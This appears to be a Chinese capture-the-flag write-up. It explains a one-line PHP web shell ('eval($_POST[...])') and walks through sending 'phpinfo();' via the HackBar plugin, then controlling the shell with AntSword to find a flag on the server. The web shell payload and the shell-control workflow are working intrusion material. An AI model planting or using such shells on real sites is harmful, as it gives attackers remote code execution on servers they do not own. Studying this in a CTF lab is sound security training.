题目:
解题:
1:一句话木马
形式:<?php eval($_POST['shell']);?>
原理:存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。
2:尝试用HackBar传数据
HackBar:chrome插件,是web渗透的SQL注入工具。
插件下载:https://github.com/Mr-xn/hackbar2.1.3
插件安装:将下载的压缩包HackBar-v2.3.1.zip拖到chrome扩展程序安装页即可
插件激活:在扩展程序里,点击hackbar插件详细信息,点击加载来源
找到..\theme\js\hackbar-panel.js文件,按下图进行对应的修改。
Load URL加载当前链接,Post data为Syc=phpinfo(); 如下图:
点击Execute即可发送数据,执行phpinfo()命令:
3:用AntSword连接
蚁剑:一 款比菜刀还牛的shell控制端软件,是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
下载:需要下载两个部分,一个是项目核心源码antSword,另一个是加载器antsword-loader;下载地址为https://github.com/AntSwordProject/。
安装:打开运行加载器,初始化时,选择源码antSword所在文件夹即可。
添加数据:填写URL地址,连接密码Syc,如图:
双击运行数据,连接成功如图:
然后在所有目录下尝试查找flag或有用信息:
该flag.txt为空的,迷惑信息,最终在根目录找到flag文件: